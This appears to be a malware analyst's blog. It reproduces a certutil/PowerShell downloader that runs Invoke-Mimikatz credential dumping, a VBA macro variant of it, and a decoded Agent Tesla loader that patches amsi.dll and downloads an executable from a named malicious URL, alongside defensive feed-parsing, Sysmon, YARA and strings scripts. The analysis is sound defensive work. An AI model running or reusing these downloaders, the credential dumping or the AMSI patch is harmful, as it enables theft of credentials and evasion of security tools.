
Thursday, January 13, 2022

downloader certutil powershell invoke-mimikatz

sample downloader that executed mimikatz


# Sample as captured. Three stages, each a detection point on its own:
#   1. certutil.exe -urlcache -split -f <url> <file> fetches the payload with a signed Windows
#      binary (the "LOLBin" download pattern; the URL cache it populates is also a forensic artifact).
#   2. The file is base64-decoded in PowerShell and written back over itself in the clear.
#   3. A second PowerShell is started with -version 2 to run the decoded script through iex and call
#      Invoke-Mimikatz -DumpCreds. A v2 engine start is itself worth alerting on: that engine
#      predates script block logging and AMSI integration.
# Note: the -command string on the powershell line is never closed in this capture.
certutil.exe -urlcache -split -f http://somewhere/test.txt 'test.txt';

$B64 = get-content test.txt ;

$clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64));

$clear |out-file -filepath 'test.txt';

powershell -version 2 -command "iex (get-content 'test.txt'|out-string);

Invoke-Mimikatz -DumpCreds


VBA Macro downloader invoke-mimikatz

' VBA macro variant of the same downloader, as captured. Three Shell() calls, each a child
' process of the Office application - the Office -> certutil / powershell / cmd process tree is
' the primary detection opportunity here:
'   1. certutil.exe -urlcache -split -f downloads the encoded payload.
'   2. powershell.exe -noprofile sleeps 5 s, then base64-decodes the file in place.
'   3. cmd.exe launches PowerShell through the sysnative path (the redirector a 32-bit process
'      uses to reach the 64-bit System32 binaries) with -version 2, iex's the decoded script
'      and calls invoke-mimikatz.
' Note: stage 1 saves "tes5.txt" while stages 2 and 3 read 'test.txt' - reproduced as captured.
Shell ("certutil.exe -urlcache -split -f http://somewhere/test4.txt ""tes5.txt""")


Shell ("powershell.exe -noprofile -command ""start-sleep -s 5; $B64 = get-content 'test.txt' ; $clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64)); $clear |out-file -filepath 'test.txt';""")


Shell ("cmd.exe /c ""c:\windows\sysnative\windowspowershell\v1.0\powershell.exe -version 2 -noprofile -noexit -command ""start-sleep -s 15; iex (get-content 'test.txt'|out-string); invoke-mimikatz -command 'token::whoami';""""")



Tuesday, August 4, 2020

Agent Tesla , Doc => Powershell => C# => EXE => SMTP

https://app.any.run/tasks/27f1e600-b8fc-4c18-a6f0-b35799393cdc/

88cd18b7fbe649bd756b3034525f34c3

function funcDecodeNetClassSourceCode {
 # Undo the loader's string obfuscation: the input is a hex string, two digits per byte,
 # and byte k is XORed with character (k mod 6) of the fixed key. Returns the plaintext.
 # An odd-length input throws from Substring, exactly as the hex pairs demand.
 param($paramEncodedNetClassSourceCode)
 $xorKey='s7c5f8';
 $decodedChars = @()
 $byteIndex = 0
 while ($byteIndex -lt ($paramEncodedNetClassSourceCode.length / 2)) {
  $hexPair = $paramEncodedNetClassSourceCode.Substring($byteIndex * 2, 2)
  $encodedByte = [convert]::ToByte($hexPair, 16)
  $decodedChars += [char]($encodedByte -bxor $xorKey[$byteIndex % $xorKey.length])
  $byteIndex++
 }
 return (-join $decodedChars)
}
# Encoded payload as extracted from the document: one long hex string, two digits per byte.
$varEncodedNetClassSourceCode = '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';
# Decode only and print the recovered C# for reading. The two lines below would compile the
# recovered class into this session and run it; they stay commented out on purpose.
$varNetClassSourceCode = funcDecodeNetClassSourceCode($varEncodedNetClassSourceCode);
write-host ("Everything Decoded: {0}" -f $varNetClassSourceCode)
# Add-Type -TypeDefinition $varNetClassSourceCode; # add malicious code to this powershell session
# [yc947f]::nf37aa(); # initiate malicious code by calling function within the decoded class



---------------------
Results
---------------------
Everything Decoded: using System;using System.Runtime.InteropServices;using System.Diagnostics;using System.IO;using System.N
et;
public class yc947f{[DllImport("kernel32",EntryPoint="GetProcAddress")]public static extern IntPtr e5974c(IntPtr ee5c8,string
 tc65b8d);[DllImport("kernel32",EntryPoint="LoadLibrary")]public static extern IntPtr r9ef96(string w1d838);[DllImport("kerne
l32",EntryPoint="VirtualProtect")]public static extern bool q6922a(IntPtr q34cd35,UIntPtr da9a6f1,uint f4f6c,out uint eea2da)
;[DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]static extern void qa8774c(IntPtr h8bddc6,IntPtr c5
cda,int zb8138d);public static int nf37aa(){IntPtr jf514=r9ef96(w2b5ee("125a105c485c1f5b"));if(jf514!=IntPtr.Zero){IntPtr n77
9c=e5974c(jf514,w2b5ee("325a105c355b12592140005e1645"));if(n779c!=IntPtr.Zero){UIntPtr qdc75=(UIntPtr)5;uint qc5f47=0;if(q692
2a(n779c,qdc75,0x40,out qc5f47)){Byte[] c8dca={0x31,0xff,0x90};IntPtr e863d=Marshal.AllocHGlobal(3);Marshal.Copy(c8dca,0,e863
d,3);qa8774c(new IntPtr(n779c.ToInt64()+0x001b),e863d,3);}}}string sb637=Environment.GetFolderPath(Environment.SpecialFolder.
ApplicationData) + "\\fd393b8" + w2b5ee("5d521b50");new WebClient().DownloadFile(w2b5ee("1b4317455c175c5116520f4c17520256074b
1219115a494f031a005a084c1659171a1348144502510317155e0f5015171c550a1b034016"),sb637);ProcessStartInfo xcb5f=new ProcessStartIn
fo(sb637);Process.Start(xcb5f);return 0;}public static string w2b5ee(string te9c2){string ee5c8="s7c5f8";string r9ef96="";for
(int i=0; i<te9c2.Length;i+=2){byte e5974c=Convert.ToByte(te9c2.Substring(i,2),16);r9ef96+=(char)(e5974c^ee5c8[(i/2)%ee5c8.Le
ngth]);}return r9ef96;}}







https://app.any.run/tasks/27f1e600-b8fc-4c18-a6f0-b35799393cdc/

88cd18b7fbe649bd756b3034525f34c3

using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.IO;
using System.Net;
# [yc947f]::nf37aa() # malicious entry point
public class yc947f{
 // P/Invoke imports. Seen together in a script-hosted assembly - LoadLibrary, GetProcAddress,
 // VirtualProtect and a raw memory copy - they are the signature of an in-process API patch;
 // VirtualProtect aimed at a loaded security DLL is the telemetry a detection should key on.
 [DllImport("kernel32",EntryPoint="GetProcAddress")]
 public static extern IntPtr funcKernel32GetProcAddress(IntPtr paramHandleToDll,string paramLibraryName);
 
 [DllImport("kernel32",EntryPoint="LoadLibrary")]
 public static extern IntPtr funcKernel32LoadLibrary(string paramDllName);

 [DllImport("kernel32",EntryPoint="VirtualProtect")]
 public static extern bool funcKernel32VirtualProtect(IntPtr paramMemoryAddress,UIntPtr paramMemorySize,uint paramNewProtectionValue,out uint paramOldProtectionValue);
 
 [DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]
 static extern void funcKernel32RtlMoveMemory(IntPtr paramDestinationAddress,IntPtr paramSourceAddress,int paramLengthOfBytes);

 // Malicious entry point, invoked from PowerShell as [yc947f]::nf37aa(). Stage 1 loads the DLL
 // named by the first decoded string (amsi.dll in the analysis output), finds one of its exports,
 // makes 5 bytes of it writable and executable (0x40 = PAGE_EXECUTE_READWRITE) and copies 3 bytes
 // over it at offset +0x1b - a patch of the scanning DLL inside this process. Stage 2 downloads
 // an executable into %APPDATA% and starts it. The Console.WriteLine calls were added during
 // analysis to surface the decoded strings; the memory patch and Process.Start are commented out
 // so the class can be run for analysis - but the DownloadFile call below is still live.
 public static int nf37aa(){
  // malicious entry point, patching AMSI Dll and a C# downloader
  string varDllName = funcDecodeString("125a105c485c1f5b");
  Console.WriteLine(String.Format("Dll: {0}", varDllName));
  IntPtr varHandleToDll=funcKernel32LoadLibrary(varDllName);
  if(varHandleToDll!=IntPtr.Zero){
   string varFunctionName = funcDecodeString("325a105c355b12592140005e1645");
   Console.WriteLine(String.Format("Function: {0}", varFunctionName));
   IntPtr varHandleToFunction=funcKernel32GetProcAddress(varHandleToDll,varFunctionName);
   if(varHandleToFunction!=IntPtr.Zero){
    UIntPtr varMemorySize=(UIntPtr)5;
    uint varOldProtectValue=0;
    if(funcKernel32VirtualProtect(varHandleToFunction,varMemorySize,0x40,out varOldProtectValue)){
     Byte[] var3BytesToCopy={0x31,0xff,0x90};
     IntPtr varHandleToAllocatedMemory=Marshal.AllocHGlobal(3);
     Marshal.Copy(var3BytesToCopy,0,varHandleToAllocatedMemory,3);
     // funcKernel32RtlMoveMemory(new IntPtr(varHandleToFunction.ToInt64()+0x001b),varHandleToAllocatedMemory,3); // overwrite bytes in function (disabled for analysis)
    }
   }
  }
  string varFileName = funcDecodeString("5d521b50");
  Console.WriteLine(String.Format("File: {0}", varFileName));
  string varFileFullPath=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\fd393b8" + varFileName;
  Console.WriteLine(String.Format("Path: {0}", varFileFullPath));
  string varUrl = funcDecodeString("1b4317455c175c5116520f4c17520256074b1219115a494f031a005a084c1659171a1348144502510317155e0f5015171c550a1b034016");
  Console.WriteLine(String.Format("Url: {0}", varUrl));
  new WebClient().DownloadFile(varUrl,varFileFullPath); // download the malware - NOTE: still active, this writes the payload to disk
  ProcessStartInfo varProcessToRun=new ProcessStartInfo(varFileFullPath);
  // Process.Start(varProcessToRun); // run the malware (disabled for analysis)
  return 0;
 }
 // Undoes the loader's string obfuscation: two hex digits per byte, XORed with the repeating
 // six-character key. Same scheme as the PowerShell funcDecodeNetClassSourceCode above.
 public static string funcDecodeString(string paramEncodedString){
  string varXorKey="s7c5f8";
  string varDecodedString="";
  for (int i=0; i<paramEncodedString.Length; i+=2){
   byte varEncodedByte=Convert.ToByte(paramEncodedString.Substring(i,2),16);
   varDecodedString+=(char)(varEncodedByte^varXorKey[(i/2)%varXorKey.Length]);
  }
  return varDecodedString;
 }
}



Dll: amsi.dll
Path: C:\Users\Win7\AppData\Roaming\fd393b8.exe
Url: http://fugitdeacasa.ro/wp-content/upgrade/files/obi.exe

Agent Tesla

c2 terminal6.veeblehosting.com
tcp port 587

https://app.any.run/tasks/ca52c30e-92fb-41ee-92cf-0483b357cbfb
https://www.virustotal.com/gui/file/ff62a08f679ddad3fae88ea47a3985d003c5dc252e826feac7f59a366487b328/community



agent tesla
https://www.virustotal.com/gui/file/ff62a08f679ddad3fae88ea47a3985d003c5dc252e826feac7f59a366487b328/behavior/C2AE

smtp

port 587

"terminal6.veeblehosting.com"
"obi@a-t-mould.com"
{obi@a-t-mould.com}
{obi@a-t-mould.com}

Thursday, April 23, 2020

Script Query UrlHaus , OpenPhish, PhishTank and Extract Dns, IPs for Threat Intel Feed

code to pull dns & ips from urlhaus, openphish, phishtank, etc.


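#usage: iex (get-content .\GetData.ps1 | out-string) > output.txt
# Pulls one phishing/malware URL feed and writes the hosts it names to two CSVs:
# dns.csv (hostnames) and ip.csv (literal IP hosts). Hosts in $ignoreList are dropped;
# they are well-known legitimate services (URL shorteners, CDNs, file hosts, Google/Microsoft
# domains) that show up in the feeds as redirectors or hosting and presumably should not end
# up in a feed-derived block list.
# Two quoting errors in the original list are fixed here: `"rawcdn.githack.com"","https"`
# (stray quote) and `"image.prntscr.com,"d1yjjnpx0p53s8...` (missing quote). Either one
# stops the whole script from parsing.
$debug = $true
$fileOutput = "dns.csv"
$fileIpOutput = "ip.csv"
$ignoreList = @("google.com", "www.google.com", "urlhaus.abuse.ch", "pastebin.com", "ak.imgfarm.com", "docs.google.com", "drive.google.com", "i.imgur.com", "img.sobot.com", "imgur.com", "www.imgur.com", "raw.githubusercontent.com", "github.com", "www.github.com", "adobe.com", "www.adobe.com", "ibm.com", "www.ibm.com", "dell.com", "www.dell.com", "bing.com", "www.bing.com", "msn.com", "www.msn.com", "documentcloud.adobe.com", "cisco.com", "www.cisco.com",  "l.yimg.com", "yimg.com", "dl.dropboxusercontent.com", "dropbox.com", "www.dropbox.com", "godaddy.com", "godaddysites.com", "files.constantcontact.com", "ipinfo.io", "bit.ly", "onedrive.live.com", "000webhostapp.com", "storage.googleapis.com", "wikileaks.org", "forms.gle", "go2l.ink", "capesandbox.com", "twitter.com", "paste.cryptolaemus.com", "cryptolaemus.com", "gist.githubusercontent.com", "bitbucket.org", "img1.wsimg.com", "cdn.discordapp.com", "web.mit.edu", "bit.do", "na3.docusign.net", "sway.office.com", "sites.google.com", "aka.ms", "login.microsoftonline.com", "track.smtpsendmail.com", "r20.rs6.net", "files.gamebanana.com", "sems.sas.com", "www.avast.com", "1.0.0.0", "bitly.com", "instagram.com", "www.instagram.com", "1.2.0.1073", "2016.3.3.0332", "3.0.0.2013", "31.128.173.853", "4.8.0.904", "cdn.speedof.me", "codeload.github.com", "tr.im", "urlz.fr", "accounts.google.com", "t.co", "fls.doubleclick.net", "1359940.fls.doubleclick.net", "rebrand.ly", "23.4.43.27", "app.smartsheet.com", "forms.office.com", "api.whatsapp.com", "form.jotform.com", "tinyurl.com", "firebasestorage.googleapis.com", "www.google.com.au", "go.pardot.com", "goo.gl", "click.icptrack.com", "online.jimmyjohns.com", "feeds.feedburner.com", "www.google.co.uk", "event.on24.com", "www.powr.io", "protect-us.mimecast.com", "visitor.constantcontact.com", "www.questionpro.com", "click.pstmrk.it", "code.jivosite.com", "apple.co", "www.google.com.mx", "linktr.ee", "www.vcita.com", "www.evernote.com", "www.123formbuilder.com", "tiny.cc", 
"app.box.com", "script.google.com", "disq.us", "click.email.microsoftemail.com", "fiddle.jshell.net", "cache.nebula.phx3.secureserver.net", "lnkd.in", "www.magazineluiza.com.br", "share.hsforms.com", "fbwat.ch", "app.dialoginsight.com", "cl.s10.exct.net", "etrack05.com", "www.alaskausa.org", "vk.com", "storage.cloud.google.com", "1drv.ms", "www.imcreator.com", "172.217.21.162", "sinacloud.net", "tinyurl.com", "is.gd", "note.youdao.com", "www.surveygizmo.com", "www.tinyurl.com", "surveygizmo.com", "ow.ly", "www.eater.com", "eater.com", "www.stats.gov.cn", "stats.gov.cn", "buff.ly", "www.angelfire.com", "epl.paypal-communication.com", "forms.zohopublic.com", "objectstorage.us-ashburn-1.oraclecloud.com", "t.yesware.com", "snip.ly", "cutt.ly", "mysurveygizmo.com", "www.mysurveygizmo.com", "gitlab.com", "ht.ly", "teamapp.com", "chat.chatra.io", "id.ee.co.uk", "paste.ee","youtube.com","www.youtube.com","play.google.com","google.com.br","docsend.com","www.google.com.br","www.emailmeform.com","emailmeform.com","web.facebook.com","upload.facebook.com","te.bathandbodyworks.com","tatatechnologies.workplace.com","statis.facebook.com","protect-eu.mimecast.com","notion.so","mtouch.facebook.com","messenger.com","j.mp","images2.imgbox.com","graph.facebook.com","fbthirdpartypixel.com","es-la.facebook.com","error.facebook.com","email.secureserver.net","edge-chat.workplace.com","edge-chat.facebook.com","deref-gmx.net","cs.atdmt.com","click.mail.onedrive.com","ca.surveygizmo.com","business.facebook.com","badge.facebook.com","apps.facebook.com","api.facebook.com","an.facebook.com","about.instagram.com","yadi.sk", "157.240.2.20", "www.notion.so","static.facebook.com","www.login-bank.org", "ctt.ec", "www.teamapp.com", "t.umblr.com", "upscri.be", "www.imeipro.info", "imeipro.info", "wisegeek.com", "deref-mail.com", "app.getaccept.com", "cdn2.hubspot.net", "slack-redir.net", "www.wisegeek.com", "chime.com", "www.chime.com", "b.link" , "hyperurl.co", "s3.ap-south-1.amazonaws.com", 
"podio.com", "s3-us-west-2.amazonaws.com", "tfaforms.com", "www.tfaforms.com", "webservice99.com", "mediafire.com", "www.mediafire.com", "smarturl.it","s3.us-east-1.amazonaws.com","www.restaurantdive.com" ,"rawcdn.githack.com","https","http","ttp","ttps","lasvegas.craigslist.org","clicktime.symantec.com","survey.survicate.com","t.me","clicktotweet.com", "www.wetransfer.com", "wetransfer.com", "www.geocities.ws", "geocities.ws", "wa.me", "email.godaddy.com", "emailmarketing.locaweb.com.br", "dlvr.it", "www.sendspace.com", "v.ht", "52.109.124.1", "static.wixstatic.com","docs.wixstatic.com","image.prntscr.com","d1yjjnpx0p53s8.cloudfront.net", "canva.com", "articulo.mercadolibre.com.mx", "e-mudhra.com", "www.canva.com", "listado.mercadolibre.com.mx")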
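# Feed to pull. Exactly one $urlIntelThem assignment should be active; the branches below pick a
# parser by markers in the response body, not by this URL.
#$urlIntelThem = "https://openphish.com/feed.txt"
#$urlIntelThem = "https://data.phishtank.com/data/online-valid.csv"
#$urlIntelThem = "https://phishstats.info/phish_score.txt"
#$urlIntelThem = "https://urlhaus.abuse.ch/downloads/csv/"
#$urlIntelThem = "https://urlhaus.abuse.ch/downloads/csv_recent/"
$urlIntelThem = "https://urlhaus.abuse.ch/downloads/csv_online/"
$rawHttpThem = ""
$rawIntelThem = ""
$dnsList = ""
$ipList = ""
$first = 0
if($debug){ Write-Output ("Requesting '{0}'" -f $urlIntelThem) }
# -UseDefaultCredentials offers the current Windows identity to the feed host if it challenges.
# None of the public feeds above needs authentication, so drop it unless an internal mirror does.
$httpResponseThem = Invoke-WebRequest -UseDefaultCredentials -Uri $urlIntelThem
# RawContent includes the HTTP response headers, so each branch locates the start of the CSV
# body by a marker specific to that feed's format.
$rawHttpThem = $httpResponseThem.RawContent
if($debug){ Write-Output ("Downloaded '{0}'" -f $urlIntelThem) }
if($rawHttpThem.IndexOf("abuse.ch") -gt 0){
    # URLhaus: the text after the last "# " marker is taken as the CSV header row plus data.
    $rawIntelThem = $rawHttpThem.SubString($rawHttpThem.LastIndexOf("# ")+2)
}elseif($rawHttpThem.IndexOf("PhishStats") -gt 0){
    # PhishStats ships no header row; supply one so ConvertFrom-Csv exposes a 'url' column.
    $rawIntelThem = "date,score,url,ip`r`n{0}" -f $rawHttpThem.SubString($rawHttpThem.LastIndexOf("# ")+2)
}elseif($rawHttpThem.IndexOf("phish_id") -gt 0){
    # PhishTank: the CSV header row starts with phish_id.
    $rawIntelThem = $rawHttpThem.SubString($rawHttpThem.IndexOf("phish_id"))
}else{
    # OpenPhish-style plain list, one URL per line: the body starts at the first "http".
    $first = $rawHttpThem.IndexOf("http")
    if($first -lt 0){
        # The original fell through to SubString(-1) and died with an ArgumentOutOfRange error.
        throw ("No URL data found in the response from '{0}'" -f $urlIntelThem)
    }
    $rawIntelThem = "url`r`n{0}" -f $rawHttpThem.SubString($first)
}
$csvThemIntel = ConvertFrom-Csv $rawIntelThem
$outputList = @()
$outputIpList = @()
$savedCount = 0
$savedIpCount = 0
$ignoredCount = 0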
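# Classify every feed URL's host as an IP hit or a DNS hit, skipping hosts in $ignoreList.
# Rows whose URL does not parse are skipped. The original handled them in the catch block
# below, which then reused $domainThem from the previous row and counted that host twice
# (or threw on .ToLower() when the very first row was malformed).
foreach($rowIntelThem in $csvThemIntel){
    $domainThem = $null
    try {
        $domainThem = ([System.Uri]::new($rowIntelThem.url).Host).ToString()
    }
    catch {
        if($debug){ Write-Output ("Skipping unparsable url '{0}'" -f $rowIntelThem.url) }
        continue
    }
    if([string]::IsNullOrEmpty($domainThem)){ continue }
    # -contains compares with -eq, which is case-insensitive, so this matches the original
    # ToLower() -eq ToLower() loop.
    if($ignoreList -contains $domainThem){
        $ignoredCount = $ignoredCount + 1
        continue
    }
    # TryParse replaces the [IPAddress] cast whose exception was used as the "it's a hostname" path.
    $ipThem = $null
    if([System.Net.IPAddress]::TryParse($domainThem, [ref]$ipThem)){
        $outputIpList += [PSCustomObject]@{ ip = $ipThem }
        $savedIpCount = $savedIpCount + 1
    }else{
        if($domainThem.ToLower().StartsWith("www.")){
            #double count it (www.ebay.com and ebay.com)
            $outputList += [PSCustomObject]@{ dns = $domainThem.SubString(4) }
            $savedCount = $savedCount + 1
        }
        $outputList += [PSCustomObject]@{ dns = $domainThem }
        $savedCount = $savedCount + 1
    }
}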
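# Write the two CSVs, then (debug only) print counts and comma-joined summaries.
if($debug){ Write-Output ("Exporting '{0}'" -f $fileOutput) }
$outputList | Export-Csv -NoTypeInformation -Path $fileOutput
if($debug){ Write-Output ("Saved '{0}'" -f $fileOutput) }
if($debug){ Write-Output ("Exporting '{0}'" -f $fileIpOutput) }
$outputIpList | Export-Csv -NoTypeInformation -Path $fileIpOutput
if($debug){ Write-Output ("Saved '{0}'" -f $fileIpOutput) }
if($debug){ Write-Output ("Dns='{0}', Ips='{1}', Ignored='{2}'" -f $savedCount, $savedIpCount, $ignoredCount) }
if($debug){
    # The [string] cast on ip matters: with exactly one IP hit the original assigned the
    # IPAddress object itself to $ipList, and Write-Output then rendered its property table
    # instead of the address. -join yields "" for an empty list, as before.
    $dnsList = @($outputList | ForEach-Object { [string]$_.dns }) -join ","
    $ipList = @($outputIpList | ForEach-Object { [string]$_.ip }) -join ","
    Write-Output $dnsList
    Write-Output $ipList
}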

Wednesday, April 22, 2020

Query Sysmon Logs using Powershell Get-WinEvent

# Sysmon Event ID 1 (process create): print only the CommandLine and ParentCommandLine
# fields of each event, with a blank line between events.
Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational";id=1} |
  Select-Object Message |
  ForEach-Object {
    $fields = $_.Message.Split([Environment]::NewLine)
    ""   # event separator
    foreach ($field in $fields) {
      $pair = $field.Split(':', 2)
      if ($pair[0] -in "CommandLine", "ParentCommandLine") {
        "{0}={1}" -f $pair[0], $pair[1]
      }
    }
  }


sample output

CommandLine= sh "C:/Program Files/Git/mingw64/libexec/git-core\\git-update-git-for-windows" --quiet --gui
ParentCommandLine= git.exe update-git-for-windows --quiet --gui

CommandLine= git.exe update-git-for-windows --quiet --gui
ParentCommandLine= cmd\git.exe update-git-for-windows --quiet --gui

CommandLine= cmd\git.exe update-git-for-windows --quiet --gui
ParentCommandLine= "C:\Program Files\Git\git-bash.exe" --hide --no-needs-console --command=cmd\git.exe update-git-for-windows --quiet --gui

CommandLine= "C:\Program Files\Git\git-bash.exe" --hide --no-needs-console --command=cmd\git.exe update-git-for-windows --quiet --gui
ParentCommandLine= C:\WINDOWS\system32\svchost.exe -k netsvcs -p -s Schedule

Monday, April 13, 2020

Wmic List all Processes, sort in powershell


# Distinct, lower-cased image names from "wmic process list": split each output line on
# whitespace and keep tokens ending in .exe that contain no backslash (names, not paths).
# wmic.exe is deprecated in current Windows releases; Get-Process is the supported equivalent.
$processes = wmic.exe process list |
  ForEach-Object {
    foreach ($token in ($_ -split '\s+')) {
      if ($token -notmatch "\\" -and $token.EndsWith(".exe")) {
        $token.ToLower()
      }
    }
  } |
  Sort-Object |
  Get-Unique

$processes

---------------
example output
---------------
adobearm.exe
aoservice.exe
apmsgfwd.exe
apntex.exe
apoint.exe
applicationframehost.exe
... more ...




---------------
example code
---------------
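# Resolve each distinct image name from wmic to the full path of a running process of that name.
# Two failure modes of the original one-liner are guarded: Get-Process erroring when a process
# in the wmic snapshot has already exited, and $_.Path being null for processes the caller cannot
# open (typically system processes), which made .ToLower() throw a null-method error.
$processpaths = wmic.exe process list |
  ForEach-Object {
    foreach ($token in ($_ -split '\s+')) {
      if ($token -notmatch "\\" -and $token.EndsWith(".exe")) { $token.ToLower() }
    }
  } |
  Sort-Object | Get-Unique |
  ForEach-Object { Get-Process -Name ($_ -replace ".{4}$") -ErrorAction SilentlyContinue } |
  Where-Object { $_.Path } |
  ForEach-Object { $_.Path.ToLower() } |
  Get-Unique

$processpaths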

---------------
example output
---------------
c:\program files (x86)\common files\adobe\arm\1.0\adobearm.exe
c:\program files\citrix\secure access client\aoservice.exe
c:\windows\system32\delltpad\apmsgfwd.exe
c:\windows\system32\delltpad\apntex.exe
c:\windows\system32\delltpad\apoint.exe
c:\windows\system32\applicationframehost.exe
c:\windows\system32\delltpad\apremote.exe
... more ...

Friday, April 10, 2020

Use Powershell to Run Yara against entire Folder of Malware

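# run "myrules.yar" against all *.bin files in a folder and print to standard output
# The file is passed to yara64.exe as its own argument instead of being spliced into a command
# string for Invoke-Expression: a path with spaces no longer splits into several arguments (the
# "could not open file: \Internet" error in the sample output is exactly that), and a sample
# whose file name contains shell metacharacters can no longer inject commands into the session.
Get-ChildItem \ -Filter *.bin | ForEach-Object {
    & ./yara64.exe myrules.yar $_.FullName -s
}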

---------

run yara against all malware files in a folder

---------
sample output
---------
MindsparkToolbar \EasyPDFCombine.bin
0x4a34e:$eula: http://eula.mindspark.com/ask/0
0x4b2e6:$eula: http://eula.mindspark.com/ask/0
0xae8c:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
0xafca:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
0xb090:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
MindsparkToolbar \EverydayLookup.bin
0x5c276:$eula: http://eula.mindspark.com/ask/0
0x5d20e:$eula: http://eula.mindspark.com/ask/0
0xc414:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
0xc55a:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
0xc620:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
MindsparkToolbar \FromDocToPdf.bin
0x5fbce:$eula: http://eula.mindspark.com/ask/0
0x60b69:$eula: http://eula.mindspark.com/ask/0
0x5f05f:$publisher: Mindspark Interactive Network, Inc.
0x5f08d:$publisher: Mindspark Interactive Network, Inc.
0x600be:$publisher: Mindspark Interactive Network, Inc.
0x600ec:$publisher: Mindspark Interactive Network, Inc.
0xae8c:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
0xafca:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
0xb090:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
error: could not open file: \Internet
MindsparkToolbar \YourTemplateFinder.bin
0x5b498:$eula: http://eula.mindspark.com/ask/0
0x5c43a:$eula: http://eula.mindspark.com/ask/0
0xae8c:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
0xafe2:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00
0xb0a8:$publisherWide: M\x00i\x00n\x00d\x00s\x00p\x00a\x00r\x00k\x00 \x00I\x00n\x00t\x00e\x00r\x00a\x00c\x00t\x00i\x00v\x00e\x00 \x00N\x00e\x00t\x00w\x00o\x00r\x00k\x00,\x00 \x00I\x00n\x00c\x00.\x00

Compare Malware Strings of Multiple Files for Matches

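# run strings on all malware *.bin files in the directory and output strings to .bin.txt files
# strings64.exe is invoked directly and its output redirected by PowerShell instead of building a
# "cmd.exe /c ... > ..." string: a sample file name containing quotes, '&' or '>' would otherwise
# be interpreted by cmd.exe as part of the command line. Runs sequentially (the Start-Process
# version spawned one cmd.exe per file in parallel). Use ./strings64.exe if it lives in the
# current folder rather than on PATH.
Get-ChildItem \ -Filter *.bin | ForEach-Object {
    & strings64.exe -n 8 $_.FullName | Set-Content -Path ($_.Name + ".txt")
}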

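# compare every .bin.txt file and return only strings that are in ALL of them
# A case-insensitive HashSet replaces "-contains" inside the inner loop, which scanned the
# whole second list once per line (O(n*m) per file pair). The accumulator is named $common
# because $matches is PowerShell's automatic variable for -match results.
$common = $null
$fileCount = 0
Get-ChildItem \ -Filter *.bin.txt | ForEach-Object {
    $fileCount++
    $lines = [System.Collections.Generic.HashSet[string]]::new([System.StringComparer]::CurrentCultureIgnoreCase)
    foreach ($line in @(Get-Content -Path $_.FullName)) { [void]$lines.Add($line) }
    if ($fileCount -eq 1) {
        $common = $lines
    } else {
        $common.IntersectWith($lines)
    }
}
# The original emitted nothing unless at least two files were compared; keep that contract.
if ($fileCount -ge 2) {
    $common | Sort-Object | Get-Unique
}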

-----------
find matches in multiple malware files
find matches in multiple lists
find matches in multiple arrays

-----------------
Sample output
-----------------
!This program cannot be run in DOS mode.
CloseHandle
GetCurrentProcess
GetProcAddress
KERNEL32.dll
USER32.dll

Compare Malware Strings of 2 Files for Matches

# run strings on both malware samples
strings64.exe -n 8 malware1.exe > str1.txt
